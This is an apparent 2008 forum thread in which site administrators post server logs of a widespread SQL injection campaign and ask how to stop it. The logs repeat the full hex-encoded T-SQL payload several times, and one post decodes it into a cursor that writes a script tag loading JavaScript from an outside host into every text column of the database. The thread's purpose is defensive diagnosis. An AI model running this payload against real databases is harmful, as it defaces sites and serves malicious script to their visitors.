[News]

News:

[jt]

jt

jt

Send jt an email.

Show jt's last posts.

Show general stats for jt.

• 
• Newbie
• Posts: 3

I am seeing many instances of logs that look like this:

98.225.77.233 - - [23/Aug/2008:21:43:44 -0400] "GET /node/400?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283
430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732062
20776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653
D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920
424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636
E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542
C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 8767 "-" "Mozilla/4.0 (compatible;
 MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
98.225.77.233 - - [23/Aug/2008:21:43:44 -0400] "GET /node/400?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861722834
30303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622
0776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D
31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D3029204
24547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E
2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D2268747
4703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C
404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 8767 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"

Any idea if I should be worried?  The site is running drual.

[mutex]

mutex

mutex

Show mutex's last posts.

Show general stats for mutex.

• 
• Administrator
• Newbie
• Posts: 782

I see a lot of them in my logs as well.  I have noticed that these "attacks" are tripping suhosin, so I don't know if the attack would have been successful or not.  I hope it would not.  Here is what I saw just a few minutes ago:

123.5.140.122 - - [23/Aug/2008:22:27:40 -0400] "GET /tag/search-engine/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861722834303030292044
45434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C7379736
36F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F72
20622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375727
36F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B
40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F736372697
0743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F
777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736
F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 22451 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CNCDialer)"
123.5.140.122 - - [23/Aug/2008:22:27:40 -0400] "GET /tag/search-engine/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204
445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973
636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7
220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572
736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272
B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F73637269
70743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2
F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F43757273
6F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 22451 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CNCDialer)"

In my /var/log/messages file, I see this:

Aug 23 22:27:40 www2 suhosin[27142]: ALERT - configured GET variable value length limit exceeded - dropped variable ';DECLARE @S CHAR(4000);SET @S' (attacker '123.5.140.122', file 'XXXXXXXX/index.php')
Aug 23 22:27:40 www2 suhosin[26345]: ALERT - configured GET variable value length limit exceeded - dropped variable '';DECLARE @S CHAR(4000);SET @S' (attacker '123.5.140.122', file 'XXXXXXXXXXX/index.php')

If you are not using suhosin already, it seems like a pragmatic step to install it.  I don't know of a good way to block these.  They appear to be originating from random sources - probably coming from botnets, so firewall rules would not be very effective.

[chadlepto]

chadlepto

chadlepto

Show chadlepto's last posts.

Show general stats for chadlepto.

• 
• Newbie
• Posts: 1

http://web-robot-abuse.blogspot.com/2008/08/latest-hack-running-right-now-is.html
http://isc.sans.org/diary.html?storyid=4771
http://isc.sans.org/diary.html?storyid=4294

This is what it is:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

From my logs:
0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522
073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E642061
2E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F5
0454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354
415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D2
2687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27
206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2
F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43
7572736F72204445414C4C4F43415445205461626C655F437572736F72

[mutex]

mutex

mutex

Show mutex's last posts.

Show general stats for mutex.

• 
• Administrator
• Newbie
• Posts: 782

chad,

Thanks much for the links.  That was quite helpful.

[Vino]

Vino

Vino

Show Vino's last posts.

Show general stats for Vino.

• 
• Newbie
• Posts: 2

My website has fallen prey to this attack, and I'm trying to now figure out how to remove the vulnerability. I found the part in the log where they injected the SQL. My logs are filled with crap like this:

2008-08-26 01:07:20 W3SVC21647 EON 67.210.107.55 GET /events/buytickets.aspx ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520 -- SNIP -- 54452054616F72%20AS%20CHAR(4000));EXEC(@S); 80 - 70.252.13.239 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+1.1.4322;+Hotbar+10.0.356.0) - - www.whitetigertkd.com 302 0 0 418 1575 890

So they are visiting this URL (among others)

http://www.whitetigertkd.com/events/buytickets.aspx?';DECLARE @S CHAR(4000);SET @S=CAST(0x--etc etc

I snipped out a bunch of hex that converts to what the gentleman above posted. There are tons of these calls all over the website, and it doesn't look like it's exploting un-escaped inputs in my website, like what usually happens with SQL injections. It simply dumps a bunch of SQL into the URI and executes it. How is this shit getting into my database? I'm more of a Linux guy so I'm not an expert on ASPX and ISS, but I was expecting to see something like, "buytickets.aspx?name=a'%3B%20drop%20table%20users%3B--" where it actually tries to exploit an un-escaped input. Moreover, the IP of the invader changes with every attempt, leading me to believe he is using a botnet, so I can't simply ban his IP.

So the question is, how do I remove the vulnerability?

[mutex]

mutex

mutex

Show mutex's last posts.

Show general stats for mutex.

• 
• Administrator
• Newbie
• Posts: 782

These attacks are extremely widespread right now. Some of them appear to be generic SQL stuffing, others are php code execution techniques. I would be mindful that you may not be seeing the actual attack that was successful against your site and not just 'noise'.

In concept, whether php, asp, or whatever language, strict parameter scrubbing needs to happen - or better yet, a translation of submitted parameters to variable that are used for database calls.

I am not a windows/IIS person, either, so I'm not able to offer good specific advice on removing the vulnerability.

[Vino]

Vino

Vino

Show Vino's last posts.

Show general stats for Vino.

• 
• Newbie
• Posts: 2

Yes, I saw this all over my logs. I doubt that is the actual point of compromise, but it does essentially the same thing all over the site. However, they're all the same, and I don't understand how using this kind of thing is actually getting privilege to run SQL code. It doesn't try to hijack any SQL input variables like a typical SQL injection attack would. I just does:

http://www.whitetigertkd.com/events/buytickets.aspx?';SQL CODE HERE

How on earth does that actually work?!? Everywhere on the internet that mentions this issue it just says "Be sure to secure your server." I would if I could figure out how the thing works.